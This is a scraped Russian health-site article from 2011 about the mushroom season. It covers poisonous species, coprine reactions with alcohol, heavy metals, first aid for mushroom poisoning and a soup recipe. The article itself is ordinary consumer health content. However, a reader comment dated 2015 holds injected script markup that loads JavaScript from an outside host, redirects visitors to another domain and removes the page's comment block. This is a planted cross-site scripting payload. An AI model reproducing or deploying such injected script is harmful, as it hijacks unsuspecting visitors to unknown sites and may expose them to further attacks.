Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Охота за гробами  >>  Охота за гробами
 
Обратная связь
 

Охота за гробами

Размер шрифта
03 августа 2011 07:00
  • google_analytics: false
  • Нравится

В августе наступает сезон грибов. Несмотря на предостережения, грибники регулярно травятся грибами, иногда насмерть. Возможно ли поесть грибочков и остаться в живых?

Грибы

Александр Тушкин / «Здоровье инфо»

Грибы – один из самых интересных и загадочных продуктов. До 1980-х годов грибы считались частью царства растений и лишь потом обрели самостоятельность. По оценкам микологов, на Земле существует не менее 1,5 млн видов грибов. Однако многие из них даже и не открыты. Из них в России официально зарегистрировано более 10 тысяч. Это не только знакомые всем шляпочные грибы, но и различные грибки и плесени.

Съедобных видов в России насчитывается не более 1000. Однако съедобные и ядовитые грибы не выделяются в какие-то особые таксоны, иногда и те и другие входят в состав одного и того же порядка, семейства и даже рода.

А как у них?
На Западе грибы хоть и любят, но собирают очень редко. В ряде западных стран рекомендуется не собирать дикорастущие грибы, а употреблять в пищу только грибы, купленные в магазине. Обычно сбором грибов занимаются жители Восточной Европы, немцы и французы. Чем западнее, тем выше требования к грибам. Поэтому на многие виды, которые в России считаются условно съедобными, порядочный европеец даже и не взглянет. Он будет искать редкие подземные грибы трюфели. Поиск трюфелей – это настоящее искусство, которое неплохо оплачивается. Килограмм трюфелей стоит до 700 евро. В конфеты «трюфель» не кладут грибы, иначе они стоили бы слишком дорого. Их заменяет крем «ганаш» из шоколада и сливочного масла.

Существует также категория условно съедобных грибов. К ним относятся ядовитые грибы, которые после тщательной кулинарной обработки становятся пригодными к употреблению. Некоторые из грибов можно есть при определенных условиях, например, в начале или конце сезона.

– Есть грибы, которые нельзя употреблять в пищу с алкоголем. Это так называемые помоечные или чернильные грибы. Содержащееся в них вещество коприн реагирует со спиртом, что вызывает реакцию, подобную той, что переживает хронический алкоголик, принимающий препарат от запоев и выпивший алкоголь (так называемая тетурамовая реакция). Это чревато серьезным отравлением, однако встречается очень редко, – рассказала «Здоровье инфо» главный врач консультативно-диагностической поликлиники ФГУН Институт токсикологии Варвара Дмитриевна Великова.

Международное название царства Fungi происходит от латинского слова fungus, что переводится как «губка». Грибы легко впитывают вещества из окружающей среды, так как, в отличие от растений, питаются готовыми органическими веществами. Большинство грибов ведет себя не «по-джентельменски»: поедают трупы (грибы-сапротрофы) или паразитируют на теле другого растения. Поэтому микологи советуют есть опята, которые паразитируют на деревьях, потому что они не всасывают разную гадость из почвы, например, отходы промышленного производства – тяжелые металлы и химикаты. Однако даже тяжелые металлы не представляют для человека особой опасности.

– Тяжелые металлы могут накапливаться, но в небольших количествах. Не следует преувеличивать опасность умеренно загрязненных металлами грибов, поскольку только 3-8% этих веществ всасываются в желудочно-кишечном тракте. Не рекомендуется собирать грибы вблизи автомобильных и железных дорог, промышленных предприятий и теплоэлектростанций, поскольку в этих зонах в почве экотоксиканты могут присутствовать в высоких концентрациях, – считает Варвара Дмитриевна.

1

Подавляющее количество отравлений обеспечивают съедобные грибы, которые плохо обработали. Белок грибов быстро портится на жаре и плохо переваривается из-за хитиновой оболочки, что приводит к расстройствам желудка. Кроме того, собранные грибы часто бывают заражены бактериями из-за экскрементов животных.

По словам эксперта, весной и ранним летом люди травятся сморчками, которые содержат ядовитую гельвелловую кислоту. Жители некоторых регионов в этот период любят собирать смертельно опасные строчки, хотя их яд гиромитрин полностью не разрушается даже после длительного кипячения.

Поздним летом и осенью, как раз сейчас, следует остерегаться грибов, которые содержат яд, подобный ядам бледной поганки (аманитинам и фалоидинам). Жителям северных регионов бояться нечего – там случаи тяжелых и смертельных отравлений носят единичный характер, так как на севере ядовитые грибы встречаются реже. А вот в районах средней и южной России (Воронежская, Липецкая и другие области) массовые отравления периодически наблюдаются.

Поганка

Помните, что к ядовитым относится большинство пластинчатых грибов, поэтому лучший способ избежать отравления ядовитыми грибами – это просто не собирать их. Однако часто съедобные и ядовитые грибы являются близкими родственниками, а отличить их может лишь грибник со стажем. Такие грибы имеют приставку «ложный», например, ложные опята. Тут правило только одно: лучше не брать гриб, в котором вы сомневаетесь.

Самым опасным из ядовитых грибов является бледная поганка и мухомор вонючий (белый). Для взрослых летальная доза составляет 30-50 г – то есть половинка такого гриба легко отправит вас на тот свет. А по запаху он напоминает сырой картофель. Ну как тут не ошибиться!

Первая помощь при отравлении грибами
Самостоятельное лечение невозможно. Срочно вызывайте скорую помощь. До приезда врачей вам следует:
• Вызвать у больного рвоту
• Уложить его в постель
• Напоить холодной водой с солью (чайная ложка на стакан). Давайте пить чуть-чуть. Помните, что алкоголь усиливает всасывание яда!
• Остатки грибов оставьте, чтобы специалисты смогли быстро определить разновидность токсина

Грибной суп

Суп из свежих опят

Очистите 300 г опят от земли, обрежьте ножки, вымойте. Плохие грибы следует выбросить. Мелко нарежьте опята и репчатый лук. Засыпьте грибы в небольшую кастрюлю и варите 40 минут. Бросьте лук и 100 г гречневой крупы. Посолите, добавьте сметаны и полстакана молока.

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - zzzzzz

01 июля 2015 в 00:09

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js"> > window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Статьи

       
Мойка посуды убивает детей   Сок из пакета или свежеотжатый. Что пить?   Когда сгниет ваш холодильник   Как не умереть в лесу  
14 февраля 2013Ученые нашли самый опасный столовый прибор 07 октября 2011В детском саду Свердловской области отравились 74 ребенка
 
09 августа 2011Опасности школьного бутерброда 29 июля 2011Пищевая инфекция в детских лагерях
 

Слайдшоу

1
Что ваш стул говорит о вас Что съесть зимой, чтобы не объесться и не заболеть
Супереда для супериммунитета этой зимой! Лучшая еда для женщин. Часть 4
10 причин перестать есть шашлык! Еда для красивой улыбки на фото
Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.